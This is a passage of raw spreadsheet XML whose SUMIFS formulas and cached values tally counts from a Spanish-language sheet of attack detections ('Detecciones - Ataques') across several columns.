        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>2</v>
      </c>
      <c r="CG47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>7</v>
      </c>
      <c r="CI47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>22</v>
      </c>
      <c r="CJ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>6</v>
      </c>
      <c r="CL47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>27</v>
      </c>
      <c r="CN47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>20</v>
      </c>
      <c r="CQ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>2</v>
      </c>
      <c r="CR47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>143</v>
      </c>
      <c r="CT47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>6</v>
      </c>
      <c r="CW47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>1</v>
      </c>
      <c r="CZ47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>878</v>
      </c>
      <c r="DI47" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ47" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GC3:$GC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>15</v>
      </c>
      <c r="DK47" s="271"/>
      <c r="DO47" s="279"/>
      <c r="DP47" s="271"/>
      <c r="DQ47" s="271"/>
      <c r="DR47" s="271"/>
      <c r="DS47" s="271"/>
      <c r="DT47" s="271"/>
      <c r="DU47" s="271"/>
      <c r="DV47" s="271"/>
      <c r="DW47" s="271"/>
      <c r="DX47" s="271"/>
      <c r="DY47" s="271"/>
      <c r="DZ47" s="271"/>
      <c r="EA47" s="271"/>
      <c r="EB47" s="271"/>
      <c r="EC47" s="271"/>
      <c r="ED47" s="280"/>
      <c r="EG47" s="279"/>
      <c r="EH47" s="271"/>
      <c r="EI47" s="275" t="s">
        <v>2509</v>
      </c>
      <c r="EJ47" s="2"/>
      <c r="EK47" s="2"/>
      <c r="EL47" s="2"/>
      <c r="EM47" s="2"/>
      <c r="EN47" s="3"/>
      <c r="EO47" s="296"/>
      <c r="EP47" s="296"/>
      <c r="EQ47" s="296"/>
      <c r="ER47" s="271"/>
      <c r="ES47" s="271"/>
      <c r="ET47" s="271"/>
      <c r="EU47" s="271"/>
      <c r="EV47" s="271"/>
      <c r="EW47" s="432"/>
      <c r="EX47" s="432"/>
      <c r="EY47" s="432"/>
      <c r="EZ47" s="432"/>
      <c r="FA47" s="367"/>
      <c r="FC47" s="334" t="s">
        <v>2452</v>
      </c>
      <c r="FD47" s="335" t="s">
        <v>2510</v>
      </c>
      <c r="FE47" s="336">
        <f>GA28</f>
        <v>0.0843373494</v>
      </c>
      <c r="FF47" s="336">
        <f>GA29</f>
        <v>0.2804878049</v>
      </c>
      <c r="FG47" s="336">
        <f>GA30</f>
        <v>0.4390243902</v>
      </c>
      <c r="FH47" s="425">
        <f>GA31</f>
        <v>0.5</v>
      </c>
      <c r="FK47" s="445"/>
      <c r="FL47" s="359"/>
      <c r="FM47" s="359"/>
      <c r="FN47" s="359"/>
      <c r="FO47" s="359"/>
      <c r="FP47" s="359"/>
      <c r="FQ47" s="392"/>
      <c r="FR47" s="392"/>
      <c r="FS47" s="392"/>
      <c r="FT47" s="392"/>
      <c r="FU47" s="392"/>
      <c r="FV47" s="392"/>
      <c r="FW47" s="392"/>
      <c r="FX47" s="392"/>
      <c r="FY47" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="FZ47" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="GA47" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="GB47" s="392"/>
      <c r="GC47" s="330" t="s">
        <v>2448</v>
      </c>
      <c r="GD47" s="12" t="s">
        <v>2455</v>
      </c>
      <c r="GE47" s="451" t="s">
        <v>2456</v>
      </c>
      <c r="GF47" s="392"/>
      <c r="GG47" s="392"/>
      <c r="GH47" s="392"/>
      <c r="GI47" s="392"/>
      <c r="GJ47" s="392"/>
      <c r="GK47" s="392"/>
      <c r="GL47" s="392"/>
      <c r="GM47" s="392"/>
      <c r="GN47" s="392"/>
      <c r="GO47" s="392"/>
      <c r="GP47" s="392"/>
      <c r="GQ47" s="392"/>
      <c r="GR47" s="392"/>
      <c r="GS47" s="392"/>
      <c r="GT47" s="392"/>
      <c r="GU47" s="392"/>
      <c r="GV47" s="392"/>
      <c r="GW47" s="392"/>
      <c r="GX47" s="392"/>
      <c r="GY47" s="392"/>
      <c r="GZ47" s="392"/>
      <c r="HA47" s="392"/>
      <c r="HB47" s="392"/>
      <c r="HC47" s="392"/>
      <c r="HD47" s="392"/>
      <c r="HE47" s="392"/>
      <c r="HF47" s="392"/>
      <c r="HG47" s="392"/>
      <c r="HH47" s="392"/>
      <c r="HI47" s="392"/>
      <c r="HJ47" s="392"/>
      <c r="HK47" s="392"/>
      <c r="HL47" s="392"/>
      <c r="HM47" s="392"/>
      <c r="HN47" s="392"/>
      <c r="HO47" s="392"/>
      <c r="HP47" s="392"/>
    </row>
    <row r="48">
      <c r="B48" s="277"/>
      <c r="C48" s="271"/>
      <c r="D48" s="271"/>
      <c r="E48" s="271"/>
      <c r="F48" s="271"/>
      <c r="G48" s="278"/>
      <c r="J48" s="277"/>
      <c r="K48" s="352" t="s">
        <v>2511</v>
      </c>
      <c r="L48" s="403" t="s">
        <v>2512</v>
      </c>
      <c r="M48" s="403" t="s">
        <v>2513</v>
      </c>
      <c r="N48" s="404" t="s">
        <v>2514</v>
      </c>
      <c r="O48" s="278"/>
      <c r="Q48" s="271"/>
      <c r="R48" s="352" t="s">
        <v>2500</v>
      </c>
      <c r="S48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="T48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="U48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="V48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="W48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Y48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>396</v>
      </c>
      <c r="Z48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>7393</v>
      </c>
      <c r="AA48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="AB48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>20</v>
      </c>
      <c r="AC48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AD48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AE48" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>37</v>
      </c>
      <c r="AF48" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AG48" s="271"/>
      <c r="AH48" s="352" t="s">
        <v>2500</v>
      </c>
      <c r="AI48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>5</v>
      </c>
      <c r="AJ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>0</v>
      </c>
      <c r="AK48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>1</v>
      </c>
      <c r="AL48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>1</v>
      </c>
      <c r="AN48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>2</v>
      </c>
      <c r="AR48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>4</v>
      </c>
      <c r="AV48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>8</v>
      </c>
      <c r="AY48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>0</v>
      </c>
      <c r="BA48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>0</v>
      </c>
      <c r="BM48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>612</v>
      </c>
      <c r="BN48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>6781</v>
      </c>
      <c r="BO48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS48" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BC3:$BC139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>0</v>
      </c>
